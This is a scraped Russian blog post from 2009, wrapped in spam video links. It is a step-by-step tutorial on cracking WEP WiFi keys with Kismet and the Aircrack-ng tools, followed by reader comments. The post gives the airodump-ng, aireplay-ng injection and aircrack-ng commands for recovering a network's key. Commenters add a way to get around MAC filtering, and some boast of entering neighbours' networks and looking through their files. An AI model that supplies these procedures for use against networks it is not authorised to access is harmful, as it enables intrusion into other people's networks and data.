Online video hd

Смотреть супер видео

Официальный сайт rnns 24/7/365

Смотреть видео бесплатно


Nivelir 23.12.09 04:19 # +0
Спасибо за топик, весьма интересно.
А научились уже ломать WPA? Теперь ведь на каждом углу пишут о ненадёжности WEP, который используют разве что владельцы старых девайсов, вроде КПК и тд.
devl547 23.12.09 04:29 # +0
Можно сломать wpa-psk. Долго, но ломается. Хотя если использовать пару-тройку видеокарт от nVidia, то подбор достаточно мало времени займет.
Nivelir 23.12.09 04:30 # +0
Мде, википедия ответила мне тут.
l1feh4ck3r 23.12.09 04:40 # +0
Интересно, сломает ли кто-нить теперь по этому ману мою домашнюю точку доступа? =)
devl547 23.12.09 04:45 # +1
Если WEP и достаточный сигнал точки - то сломают)
Но так и писалось с расчетом на то, что защиту сильнее сделаем.
ZogG 23.12.09 04:52 # +0
да зачем тебя ломать, всегда найдется тот, у кого открыт доступ. я когда переехал и не успел провести нет сидел на нете соседей. и кстати у меня вообще легче взломать, у меня по мак адрессу, а узнать его и подделать, еще проще
l1feh4ck3r 24.12.09 07:42 # +0
У меня раньше точка и была открытой. Сидело куча народу и канал вечером очень сильно проседал - пришлось поставить вот такую простую защиту. А того человека, который сломает, я найду и буду с ним пить пиво =)
Username 23.12.09 10:02 # +0
не сломаю. У меня тупо мак-фильтр стоит.
albibek 23.12.09 11:00 # +1
Мак-фильтр обходится элементарно.
Назначаем хакерской машине мак из списка разрешённых. Дожидаемся легитимного обмена, потом прописываем себе мак этой станции. Возмжожно, придётся дождаться, пока эта станция продпадёт из сети, но скорее всего даже это не понадобится.
Username 23.12.09 13:17 # +0
как бэ ПЫЩ!
во-первых, я таки просматриваю иногда, подключается ли кто или нет
во-вторых, мак-адрес надо еще узнать
devl547 23.12.09 15:16 # +1
>подключается ли кто или нет

там будет ВАШ mac-адрес

> мак-адрес надо еще узнать

Элементарно узнается airdump'ом
Username 23.12.09 17:39 # +0
там будет ВАШ mac-адрес

там будет время, когда я реально не сидел в инете. Лихо, да?
commonD 23.12.09 19:11 # +1
там будет время, когда я реально не сидел в инете. Лихо, да?
А толку то? Факт использования интернета ни куда не исчезнет.
Username 24.12.09 12:56 # +0
эээ. Ну и чо? Ну посидит он у меня минут 20. Мне-то что, у меня анлим, меня это несильно озаботит
booley 24.12.09 13:07 # +0
С этого и стоило начинать :)
booley 23.12.09 10:51 # +0
Не сломаю. Лень :)
Если честно, даже wifi нет.
bosha 23.12.09 10:15 # +0
Жаль таким способом wpa2 не сломать =(
LeXuS 23.12.09 13:15 # +0
Хорошо, что WPA2 не взломать, можно не бояться за свою домашнюю сеть =)
nikebl 23.12.09 13:42 # +0
не всегда...
nikebl 23.12.09 13:42 # +0
http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=взлом+wpa2
commonD 23.12.09 19:16 # +0
Ну так и что? За сколько времени ты сбрутишь пасс длиной в 512 бит?
pioner14 23.12.09 10:32 # +0
Интересно, этот хак все таки работает?
С удовольствием попробовал бы если бы карточка была.
devl547 23.12.09 11:48 # +0
Конечно работает, все скрины и указания делал с реальной атаки (правда точка доступа моя, чужую сеть ломать не хотелось)
pioner14 23.12.09 15:14 # +0
Спасибо!
Действительно - в закладки!
exelens 23.12.09 12:25 # +0
Интересно, этот хак все таки работает?
работает
solomenikm 23.12.09 13:05 # +-1
В закладки :)
Craftuser 23.12.09 14:27 # +0
Как-то раз похожим образом влез во все сети какие ловились в доме: кроме порнухи, вирусов и фоток типа "Йа в клабе" у юзеров на компах и не хранится, тому кто не заботится о безопасности и скрывать то нечего:) Ну разве только пароли от контакта:)
Craftuser 23.12.09 14:28 # +1
*не хранится ничего ценного*
solomenikm 23.12.09 16:31 # +0
На всякий случай. Нет смысла запускать это все на виртуальной машине123ы т.к. доступ к сетевой карте (wifi разумеется) всеравно получить не удасться. По крайней мере у меня на virtualbox не удалось. Если кто знает как это сделать - буду очень благодарен за решение.
Cucumber 23.12.09 17:11 # +2
Не хорошо такие статьи выкладывать... Сотни лемингов сейчас ломают соседей.
devl547 23.12.09 17:28 # +3
Ну так пусть соседи переходят на нормальную защиту.
А то WEP напоминает стеклянную стену в женскую баню - стена есть, а толку нет.
Username 23.12.09 17:41 # +0
/me мечтательно посмотрел на роутер
JeanRiga 23.12.09 17:24 # +0
объясните пожалуйста, что надо прописать v kismet.conf в строке source=
моя карта:Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
interface wlan0
заранее благодарю
devl547 23.12.09 17:30 # +1
source=ipw3945,wlan0,Intel
JeanRiga 23.12.09 17:58 # +0
запустился, спасибо !
у меня еще вопрос, запустив kismet, я отключаюсь от своей wifi точки, пропадает инет и т.д, вот после закрытия kismet не знаю как вернуть обратно свою wifi точку,я если правильно понимаю, моя карта переходит в "другой режим" и сканирует, а как вернуть прежние настройки, так как после этого показывает, что карта включена, но беспроводных сетей не видит.извиняюсь за может глупые вопросы
devl547 23.12.09 18:04 # +1
Да, карта переходит в monitor mode.
Выход - iwconfig wlan0 mode managed
cppmm 23.12.09 23:54 # +0
Ну, WEP давно уже сломанный.
Но и WPA/WPA2 абсолютной защиты не дают. Везде нужен комплексный подход.
Вот я у себя дома использую шифрование по WPA2+radius-аутентификацию+авторизация отдельных сервисов(в частности, всё, что напрямую заворачивается в squid). В итоге, даже если кто-то поломает мой WPA2, он попадёт только в мою локалку, где увидит, что есть в ней несколько компов и всё(а я увижу его, потому как nagios никто не отменял). Взлом отдельных компов - это отдельный разговор. Но и интернета он не получит, потому как пока не зарегистрируется на сервере через шлюз пройти не сможет. А если сможет взломать radius, снова поймает грабли, потому как доступ компам и моей локалки ограничен своими паролями. Причём разными на разные сервисы.
Конечно, от профессионального крякера и это не спасёт, но 99% мальчиков, начитавшихся журнала "ксакеп" я таким образом отшиваю гарантированно.
l1feh4ck3r 24.12.09 07:49 # +2
>Конечно, от профессионального крякера и это не спасёт
Какому профессионалу понадобится ломать твою домашнюю сеть?
Единственное, наверное, только из спортивного интереса.
cppmm 24.12.09 10:36 # +0
Надеюсь, что никакому не понадобится. :)
m039 01.02.10 16:42 # +0
Спасибо за наводку. Сетку соседей быстро нащупал, так что теперь как минимум никакого WEP-a.
Теперь появился интерес к WPA. :)

23.12.09 03:56 devl547

SecurityСеть с WEP - открытая сеть.

С распространением WiFi сетей остро встала проблема защиты их от несанкционированного доступа. Но, к сожалению, большинство (а именно те самые 95% людей) абсолютно не разбираются в данном вопросе и оставляют свою сеть практически открытой для доступа.

Сегодня я покажу уже довольно известный способ получить доступ к WiFi сети с WEP шифрованием.


Используется LiveCD Backtrack 4.0pre и утилиты Kismet и Aircrack-ng.

Для начала узнаем наш mac-адрес командой ifconfig

1
2
3
4
5
6
wlan0     Link encap:Ethernet  HWaddr 00:19:7e:8c:00:78
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


Итак, наш mac - 00:19:7e:8c:00:78. Запишите его где-нибудь, он нам пригодится.

Идем дальше, в консоли запускаем kismet. Если ругается на недоступность устройств для сканирования, то редактируем kismet.conf (строка ncsource) и запускаем снова.



Выбираем сеть с WEP шифрованием и записываем ее имя, bssid и канал

Закрываем Kismet и начинаем работать с пакетом Aircrack-NG

Запускаем airodump-ng:

airodump-ng --channel [сюда канал, на котором вещает сеть] --bssid [сюда bssid точки доступа] -w [куда писать дампы] [устройство, у меня это wlan0]



Открываем еще одно окно терминала или новую вкладку.

Запускаем aireplay-ng:

aireplay-ng -1 0 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]

И пытаемся установить соединение с точкой доступа. Как только оно получено, делаем:

aireplay-ng -3 -e [имя сети] -a [bssid] -h [наш mac-адрес] [устройство]

для закидывания точки пакетами.



Возвращаемся к airodump и смотрим как увеличивается число пакетов с данными. Для успешного подбора пароля нам необходимо собрать не менее 5-10 тысяч.

Далее открываем третий терминал и запускаем собственно сам подбор пароля.

aircrack-ng -z -с -b [bssid] [файлы дампов. например wepcrack*.cap]



Ждем... И ждем... Зависит от нагруженности точки и числа пойманных пакетов.
..На 74357181-й попытке- сервер согласился,что у него пароль "Мао Цзедун"

Пароль подобран:



Осталось только вписать его в ваш менеджер сетевых подключений.

При написании данного поста пострадали два бутерброда и один чайный пакетик.

P.S. Как я уже говорил раньше, я совершенно не умею обьяснять и писать инструкции.
Поэтому на все вопросы отвечу в комментариях и поправлю пост уже по ходу.


Посты Комментарии
Последние посты
    Посты Комментарии
    Последние комментарии
      Посты Комментарии
      Изменения
        Посты Комментарии Изменения Черновики Избранное
        Черновики (все)
          Посты Комментарии Изменения Черновики Избранное
          Избранное (всё)
            Посты Комментарии Изменения Черновики Избранное
            Лучшие блоги (все 96)
            Топ пользователей Топ блогов
            Топ пользователей Топ блогов
            Элита (все 2003 из 153 городов)
            Топ пользователей Топ блогов

            Новенькие: newstoic, atheist, dieformetal, MrPack, joom
            welinux.ru

            В хорошем качестве hd видео

            Онлайн видео бесплатно


            Смотреть русское с разговорами видео

            Online video HD

            Видео скачать на телефон

            Русские фильмы бесплатно

            Full HD video online

            Смотреть видео онлайн

            Смотреть HD видео бесплатно

            School смотреть онлайн